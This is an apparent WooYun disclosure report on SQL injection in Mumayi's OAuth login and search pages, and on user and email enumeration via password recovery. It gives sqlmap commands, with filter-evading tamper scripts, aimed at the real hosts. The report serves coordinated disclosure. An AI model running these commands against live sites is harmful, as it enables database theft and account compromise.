漏洞概要
关注数(24)
关注此漏洞
漏洞标题:木蚂蚁2处SQL注入以及另一处用户名、邮箱遍历问题
提交时间:2014-12-17 09:36
修复时间:2015-01-31 09:38
公开时间:2015-01-31 09:38
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-12-17: 细节已通知厂商并且等待厂商处理中
2014-12-17: 厂商已经确认,细节仅向厂商公开
2014-12-27: 细节向核心白帽子及相关领域专家公开
2015-01-06: 细节向普通白帽子公开
2015-01-16: 细节向实习白帽子公开
2015-01-31: 细节向公众公开
简要描述:
详细说明:
之前的洞都补上了,但是问题还是有还是很类似的。
http://u.mumayi.com/oauth/?m=Oauth&a=authorize&client_id=100003&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&response_type=code
主登陆界面存在post注入
sqlmap -u "http://u.mumayi.com/oauth/?m=Oauth&a=authorize" --data "usernm=1&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep"
sqlmap -u "http://u.mumayi.com/oauth/?m=Oauth&a=authorize" --data "usernm=1&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep" --dbs
还是涉及用户库其他其他重要库
http://s.mumayi.com/index.php?q=1&typeid=0 搜索网站 也存在注入(q参数存在注入)
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0"
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0" --dbs
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -D developer --table
记得带上tamper
太多了
还有一个小问题 上次有说过
http://u.mumayi.com/?a=retrievepass
找回密码 根据UID可以遍历出 所有用户名字、邮箱
直接审查元素都可以看到
而且登陆都不需要验证码 很容易爆破的
合在一起交咯,求高rank
漏洞证明:
之前的洞都补上了,但是问题还是有还是很类似的。
http://u.mumayi.com/oauth/?m=Oauth&a=authorize&client_id=100003&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&response_type=code
主登陆界面存在post注入
sqlmap -u "http://u.mumayi.com/oauth/?m=Oauth&a=authorize" --data "usernm=1&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep"
sqlmap -u "http://u.mumayi.com/oauth/?m=Oauth&a=authorize" --data "usernm=1&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep" --dbs
还是涉及用户库其他其他重要库
http://s.mumayi.com/index.php?q=1&typeid=0 搜索网站 也存在注入(q参数存在注入)
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0"
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0" --dbs
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -D developer --table
记得带上tamper
太多了
还有一个小问题 上次有说过
http://u.mumayi.com/?a=retrievepass
找回密码 根据UID可以遍历出 所有用户名字、邮箱
直接审查元素都可以看到
而且登陆都不需要验证码 很容易爆破的
合在一起交咯,求高rank
修复方案:
版权声明:转载请注明来源 玉林嘎@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2014-12-17 10:02
厂商回复:
感谢提醒,正在处理
最新状态:
2015-01-06:
漏洞评价:
评论